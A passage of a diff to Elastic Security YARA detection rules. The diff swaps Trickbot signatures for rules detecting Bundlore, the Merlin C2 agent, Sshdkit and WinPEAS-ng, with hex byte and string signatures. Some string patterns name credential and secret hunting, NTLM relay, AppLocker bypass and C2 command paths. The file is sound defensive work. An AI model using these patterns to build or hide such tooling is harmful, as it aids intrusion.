"e7932501-66bf-4713-b10e-bcda29f4b901" - date = "2021-03-28" - modified = "2021-08-23" + id = "3965578d-3180-48e4-b5be-532e880b1df9" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L117-L134" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "f82704a408a0cf1def2a5926dc4c02fa56afea1422c88ba41af50d44c60edb07" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Bundlore.yar#L81-L99" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d72543505e36db40e0ccbf14f4ce3853b1022a8aeadd96d173d84e068b4f68fa" + logic_hash = "6bd24640e0a3aa152fcd90b6975ee4fb7e99ab5f2d48d3a861bc804c526c90b6" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ae31b49266386a6cf42289a08da4a20fc1330096be1dae793de7b7230225bfc7" + fingerprint = "e41f08618db822ba5185e5dc3f932a72e1070fbb424ff2c097cab5e58ad9e2db" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a = { 24 0C 01 00 00 00 85 C0 7C 2F 3B 46 24 7D 2A 8B 4E 20 8D 04 } + $a = { 35 33 2A 00 00 60 80 35 2D 2A 00 00 D0 80 35 27 2A 00 00 54 80 35 21 2A 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Trickbot_Cd0868D5 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Bundlore_00D9D0E9 : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" author = "Elastic Security" - id = "cd0868d5-42d8-437f-8c1a-303526c08442" - date = "2021-03-28" - modified = "2021-08-23" + id = "00d9d0e9-28d8-4c32-bc6f-52008ee69b07" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L136-L153" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "053a99e5e722fd2aa1cae96266cc344954f9c3a12d0851fa9d5e95a6420651f4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Bundlore.yar#L101-L119" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "73069b34e513ff1b742b03fed427dc947c22681f30cf46288a08ca545fc7d7dd" + logic_hash = "535831872408caa27984190d1b1b1a5954e502265925d50457e934219598dbfd" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2f777285a90fce20cd4eab203f3ec7ed1c62e09fc2dfdce09b57e0802f49628f" + fingerprint = "7dcc6b124d631767c259101f36b4bbd6b9d27b2da474d90e31447ea03a2711a6" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a = { 8D 1C 01 89 54 24 10 8B 54 24 1C 33 C9 66 8B 0B 8D 3C 8A 8B 4C } + $a = { 35 8E 11 00 00 55 80 35 88 11 00 00 BC 80 35 82 11 00 00 72 80 35 7C 11 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Trickbot_515504E2 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Bundlore_650B8Ff4 : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" author = "Elastic Security" - id = "515504e2-6b7f-4398-b89b-3af2b46c78a7" - date = "2021-03-28" - modified = "2021-08-23" + id = "650b8ff4-6cc8-4bfc-ba01-ac9c86410ecc" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L155-L172" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "5410068e09de4a1283f98f6364ddf243373e228ba060b00699db6323f1167684" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Bundlore.yar#L121-L139" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "78fd2c4afd7e810d93d91811888172c4788a0a2af0b88008573ce8b6b819ae5a" + logic_hash = "e8a706db010e9c3d9714d5e7a376e9b2189af382a7b01db9a9e7ee947e9637bb" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8eb741e1b3bd760e2cf511ad6609ac6f1f510958a05fb093eae26462f16ee1d0" + fingerprint = "4f4691f6830684a71e7b3ab322bf6ec4638bf0035adf3177dbd0f02e54b3fd80" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a = { 6A 00 6A 00 8D 4D E0 51 FF D6 85 C0 74 29 83 F8 FF 74 0C 8D } + $a = { 35 8B 11 00 00 60 80 35 85 11 00 00 12 80 35 7F 11 00 00 8C 80 35 79 11 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Trickbot_A0Fc8F35 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Bundlore_C8Ad7Edd : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" author = "Elastic Security" - id = "a0fc8f35-cbeb-43a8-b00d-7a0f981e84e4" - date = "2021-03-28" - modified = "2021-08-23" + id = "c8ad7edd-4233-44ce-a4e5-96dfc3504f8a" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L174-L191" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "7ab2b45ddfc1d7fa409a6ea3dfd8d4940e1bdf3fc0cb6c7e8d49c60e7bda5b1b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Bundlore.yar#L141-L159" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d4915473e1096a82afdaee405189a0d0ae961bd11a9e5e9adc420dd64cb48c24" + logic_hash = "be09b4bd612bb499044fe91ca4e1ab62405cf1e4d75b8e1da90e326d1c66e04f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "033ff4f47fece45dfa7e3ba185df84a767691e56f0081f4ed96f9e2455a563cb" + fingerprint = "c6a8a1d9951863d4277d297dd6ff8ad7b758ca2dfe16740265456bb7bb0fd7d0" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a = { 18 33 DB 53 6A 01 53 53 8D 4C 24 34 51 8B F0 89 5C 24 38 FF D7 } + $a = { 35 74 11 00 00 D5 80 35 6E 11 00 00 57 80 35 68 11 00 00 4C 80 35 62 11 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Trickbot_Cb95Dc06 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Bundlore_Cb7344Eb : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" author = "Elastic Security" - id = "cb95dc06-6383-4487-bf10-7fd68d61e37a" - date = "2021-03-28" - modified = "2021-08-23" + id = "cb7344eb-51e6-4f17-a5d4-eea98938945b" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L193-L210" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "563b2311d37ace2d09601a70325352db3fcbf135e7ce518965f5410081b5d626" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Bundlore.yar#L161-L179" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "53373668d8c5dc17f58768bf59fb5ab6d261a62d0950037f0605f289102e3e56" + logic_hash = "6b5e868dfd14e9b1cdf3caeb1216764361b28c1dd38849526baf5dbdb1020d8d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0d28f570db007a1b91fe48aba18be7541531cceb7f11a6a4471e92abd55b3b90" + fingerprint = "6041c50c9eefe9cafb8768141cd7692540f6af2cdd6e0a763b7d7e50b8586999" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a = { 08 5F 5E 33 C0 5B 5D C3 8B 55 14 89 02 8B 45 18 5F 89 30 B9 01 00 } + $a = { 35 ED 09 00 00 92 80 35 E7 09 00 00 93 80 35 E1 09 00 00 16 80 35 DB 09 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Trickbot_9D4D3Fa4 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Bundlore_753E5738 : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" author = "Elastic Security" - id = "9d4d3fa4-4e37-40d7-8399-a49130b7ef49" - date = "2021-03-28" - modified = "2021-08-23" + id = "753e5738-0c72-4178-9396-d1950e868104" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L212-L229" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "7c3c9917a95248fd990b6947a0304ded473bf1bcceec8f4498a7955e879d348b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Bundlore.yar#L181-L199" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "42aeea232b28724d1fa6e30b1aeb8f8b8c22e1bc8afd1bbb4f90e445e31bdfe9" + logic_hash = "7a6907b51c793e4182c1606eab6f2bcb71f0350a34aef93fa3f3a9f1a49961ba" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b06c3c7ba1f5823ce381971ed29554e5ddbe327b197de312738165ee8bf6e194" + fingerprint = "c0a41a8bc7fbf994d3f5a5d6c836db3596b1401b0e209a081354af2190fcb3c2" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a = { 89 44 24 18 33 C9 89 44 24 1C 8D 54 24 38 89 44 24 20 33 F6 89 44 } + $a = { 35 9A 11 00 00 96 80 35 94 11 00 00 68 80 35 8E 11 00 00 38 80 35 88 11 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Trickbot_34F00046 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Bundlore_7B9F0C28 : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" author = "Elastic Security" - id = "34f00046-8938-4103-91ec-4a745a627d4a" - date = "2021-03-28" - modified = "2021-08-23" + id = "7b9f0c28-181d-4fdc-8a57-467d5105129a" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L231-L248" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "f9d646645d6726e3aac5cc3eaea9edf1c89c7e743aff7cfa73998a72f3446711" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Bundlore.yar#L201-L219" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fc4da125fed359d3e1740dafaa06f4db1ffc91dbf22fd5e7993acf8597c4c283" + logic_hash = "32abbb76c866e3a555ee6a9c39f62a0712f641959b66068abfb4379baa9a9da9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5c6f11e2a040ae32336f4b4c4717e0f10c73359899302b77e1803f3a609309c0" + fingerprint = "dde16fdd37a16fa4dae24324283cd4b36ed2eb78f486cedd1a6c7bef7cde7370" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a = { 30 FF FF FF 03 08 8B 95 30 FF FF FF 2B D1 89 95 30 FF FF FF } + $a = { 35 B6 15 00 00 81 80 35 B0 15 00 00 14 80 35 AA 15 00 00 BC 80 35 A4 15 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Trickbot_F2A18B09 : FILE MEMORY +rule ELASTIC_Multi_Trojan_Merlin_32643F4C : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "Detects Multi Trojan Merlin (Multi.Trojan.Merlin)" author = "Elastic Security" - id = "f2a18b09-f7b3-4d1a-87ab-3018f520b69c" - date = "2021-03-28" - modified = "2021-08-23" + id = "32643f4c-ee47-4ed2-9807-7b85d3f4e095" + date = "2024-03-01" + modified = "2024-05-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L250-L267" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "c4c4b0b1df1e8fde87284fb27d46e917c47b479a675fec60faeca6185511907d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Trojan_Merlin.yar#L1-L28" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "84b988c4656677bc021e23df2a81258212d9ceba13be204867ac1d9d706404e2" + logic_hash = "7de2deec0e2c7fd3ce2b42762f88bfe87cb4ffb02b697953aa1716425d6f1612" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3e4474205efe22ea0185c49052e259bc08de8da7c924372f6eb984ae36b91a1c" + fingerprint = "bce277ef43c67be52b67c4495652e99d4707975c79cb30b54283db56545278ae" severity = 100 - arch_context = "x86" + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "multi" strings: - $a = { 04 39 45 08 75 08 8B 4D F8 8B 41 18 EB 0F 8B 55 F8 8B 02 89 } + $a1 = "json:\"killdate,omitempty\"" + $a2 = "json:\"maxretry,omitempty\"" + $a3 = "json:\"waittime,omitempty\"" + $a4 = "json:\"payload,omitempty\"" + $a5 = "json:\"skew,omitempty\"" + $a6 = "json:\"command\"" + $a7 = "json:\"pid,omitempty\"" + $b1 = "/merlin-agent/commands" + $b2 = "/merlin/pkg/jobs" + $b3 = "github.com/Ne0nd0g/merlin" condition: - all of them + all of ($a*) or all of ($b*) } -rule ELASTIC_Windows_Trojan_Trickbot_D916Ae65 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Sshdkit_18A0B82A : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "Detects Linux Trojan Sshdkit (Linux.Trojan.Sshdkit)" author = "Elastic Security" - id = "d916ae65-c97b-495c-89c2-4f1ec90081d2" - date = "2021-03-28" - modified = "2021-08-23" + id = "18a0b82a-94ff-4328-bfa7-25034f170522" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L269-L286" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "e0aafe498cd9f0e8addfef78027943a754ca797aafae0cb40f1c6425de501339" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Sshdkit.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "003245047359e17706e4504f8988905a219fcb48865afea934e6aafa7f97cef6" + logic_hash = "4b7a78ebf3c114809148cc9855379b2e63c959966272ad45759838d570b42016" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2e109ed59a1e759ef089e04c21016482bf70228da30d8b350fc370b4e4d120e0" + fingerprint = "9bd28a490607b75848611389b39cf77229cfdd1e885f23c5439d49773924ce16" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 5F 24 01 10 CF 22 01 10 EC 22 01 10 38 23 01 10 79 23 01 10 82 } + $a = { 06 2A CA 37 F2 31 18 0E 2F 47 CD 87 9D 16 3F 6D } condition: all of them } -rule ELASTIC_Windows_Trojan_Trickbot_52722678 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Winpeas_Ng_66197D54 : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "WinPEAS detection based on the dotNet binary, application module" author = "Elastic Security" - id = "52722678-afbe-43ec-a39b-6848b7d49488" - date = "2021-03-28" - modified = "2021-08-23" + id = "66197d54-3cd2-4006-807d-24d0e0d9e25a" + date = "2022-12-21" + modified = "2023-02-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L288-L305" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "6340171fdde68b32de480f1f410aa4c491a8fffa7c1f699bf5fa72a12ecb77b8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" + logic_hash = "7bccf37960e2f197bb0021ecb12872f0f715b674d9774d02ec4e396f18963029" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e67dda5227be74424656957843777ea533b6800576fd85f978fd8fb50504209c" + fingerprint = "951f0ca036a0ab0cf2299382049eecb78f35325470f222c6db90a819b9414083" + threat_name = "Windows.Hacktool.WinPEAS-ng" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -82417,27 +82917,36 @@ rule ELASTIC_Windows_Trojan_Trickbot_52722678 : FILE MEMORY os = "windows" strings: - $a = { 2B 5D 0C 89 5D EC EB 03 8B 5D EC 8A 1C 3B 84 DB 74 0D 38 1F } + $win_0 = "Possible DLL Hijacking, folder is writable" ascii wide + $win_1 = "FolderPerms:.*" ascii wide + $win_2 = "interestingFolderRights" ascii wide + $win_3 = "(Unquoted and Space detected)" ascii wide + $win_4 = "interestingFolderRights" ascii wide + $win_5 = "RegPerms: .*" ascii wide + $win_6 = "Permissions file: {3}" ascii wide + $win_7 = "Permissions folder(DLL Hijacking):" ascii wide condition: - all of them + 4 of them } -rule ELASTIC_Windows_Trojan_Trickbot_28A60148 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Winpeas_Ng_E8Ed269C : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "WinPEAS detection based on the dotNet binary, checks module" author = "Elastic Security" - id = "28a60148-2efb-4cd2-ada1-dd2ae2699adf" - date = "2021-03-28" - modified = "2021-08-23" + id = "e8ed269c-3191-44c0-a9c6-55172fb59c8c" + date = "2022-12-21" + modified = "2023-02-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L307-L324" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "20a26ed3f0da3a77867597494bf0069a2093ec19b1c5e179c0e7934c1b69d4b9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L29-L57" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" + logic_hash = "c56b6dfb2c3ae657615c825a4d5d5640c2204fa4217262e1ccb4359d5a914a63" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c857aa792ef247bfcf81e75fb696498b1ba25c09fc04049223a6dfc09cc064b1" + fingerprint = "7b6ede4d95b2d6d2a43e729365adb9de3fde74ed731cafdb88916ac3925f9164" + threat_name = "Windows.Hacktool.WinPEAS-ng" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -82445,27 +82954,38 @@ rule ELASTIC_Windows_Trojan_Trickbot_28A60148 : FILE MEMORY os = "windows" strings: - $a = { C0 31 E8 83 7D 0C 00 89 44 24 38 0F 29 44 24 20 0F 29 44 24 10 0F 29 } + $win_0 = "systeminfo" ascii wide + $win_1 = "Please specify a valid log file." ascii wide + $win_2 = "argument present, redirecting output" ascii wide + $win_3 = "max-regex-file-size" ascii wide + $win_4 = "-lolbas" ascii wide + $win_5 = "[!] the provided linpeas.sh url:" ascii wide + $win_6 = "sensitive_files yaml" ascii wide + $win_7 = "Getting Win32_UserAccount" ascii wide + $win_8 = "(local + domain)" ascii wide + $win_9 = "Creating AppLocker bypass" ascii wide condition: - all of them + 5 of them } -rule ELASTIC_Windows_Trojan_Trickbot_997B25A0 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Winpeas_Ng_413Caa6B : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "WinPEAS detection based on the dotNet binary, event module" author = "Elastic Security" - id = "997b25a0-aeac-4f74-aa87-232c4f8329b6" - date = "2021-03-28" - modified = "2021-08-23" + id = "413caa6b-90b7-4763-97b3-49aeb5a97cf6" + date = "2022-12-21" + modified = "2023-02-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L326-L343" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "ca688086c4628c64c32a99083d620bcb5373e3100d154331451a3e9f86081aca" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L59-L87" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" + logic_hash = "4f2417d61be5e68630408a151cd73372aef9e7f4638acf4e80bfa5b2811119a7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0bba1c5284ed0548f51fdfd6fb96e24f92f7f4132caefbf0704efb0b1a64b7c4" + fingerprint = "80b32022a69be8fc1d7e146c3c03623b51e2ee4206eb5f70be753477d68800d5" + threat_name = "Windows.Hacktool.WinPEAS-ng" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -82473,27 +82993,38 @@ rule ELASTIC_Windows_Trojan_Trickbot_997B25A0 : FILE MEMORY os = "windows" strings: - $a = { 85 D2 74 F0 C6 45 E1 20 8D 4D E1 C6 45 E2 4A C6 45 E3 4A C6 45 } + $win_0 = "Interesting Events information" ascii wide + $win_1 = "PowerShell events" ascii wide + $win_2 = "Created (UTC)" ascii wide + $win_3 = "Printing Account Logon Events" ascii wide + $win_4 = "Subject User Name" ascii wide + $win_5 = "Target User Name" ascii wide + $win_6 = "NTLM relay might be possible" ascii wide + $win_7 = "You can obtain NetNTLMv2" ascii wide + $win_8 = "The following users have authenticated" ascii wide + $win_9 = "You must be an administrator" ascii wide condition: - all of them + 5 of them } -rule ELASTIC_Windows_Trojan_Trickbot_B17B33A1 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Winpeas_Ng_23Fee092 : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "WinPEAS detection based on the dotNet binary, File analysis module" author = "Elastic Security" - id = "b17b33a1-1021-4980-8ffd-2e7aa4ca2ae4" - date = "2021-03-28" - modified = "2021-08-23" + id = "23fee092-f1ff-4d9e-9873-0a68360efb42" + date = "2022-12-21" + modified = "2023-02-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L345-L362" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "7fa69674d1e985bafe310597f23ae80113136768141f0a1931baf88b2509e6ef" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L89-L115" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" + logic_hash = "ed019c9198b5d9ff8392bfd7e0b23a7b1383eabce4c71c665a3ca4a943c8b6ee" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "753d15c1ff0cc4cf75250761360bb35280ff0a1a4d34320df354e0329dd35211" + fingerprint = "4420faa4da440a9e2b1d8eadef2a1864c078fccf391ac3d7872abe1d738c926e" + threat_name = "Windows.Hacktool.WinPEAS-ng" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -82501,29 +83032,36 @@ rule ELASTIC_Windows_Trojan_Trickbot_B17B33A1 : FILE MEMORY os = "windows" strings: - $a = { 08 53 55 56 57 64 A1 30 00 00 00 89 44 24 10 8B 44 24 10 8B } + $win_0 = "File Analysis" ascii wide + $win_1 = "apache*" ascii wide + $win_2 = "tomcat*" ascii wide + $win_3 = "had a timeout (ReDoS avoided but regex" ascii wide + $win_4 = "Error looking for regex" ascii wide + $win_5 = "Looking for secrets inside" ascii wide + $win_6 = "files with ext" ascii wide + $win_7 = "(limited to" ascii wide condition: - all of them + 4 of them } -rule ELASTIC_Windows_Trojan_Trickbot_23D77Ae5 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Winpeas_Ng_861D3264 : FILE MEMORY { meta: - description = "Targets importDll64 containing Browser data stealer module" + description = "WinPEAS detection based on the dotNet binary, File Info module" author = "Elastic Security" - id = "23d77ae5-80de-4bb0-8701-ddcaff443dcc" - date = "2021-03-28" - modified = "2021-08-23" + id = "861d3264-34c3-4ff0-bdd3-44cb5ecce2c8" + date = "2022-12-21" + modified = "2023-02-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = 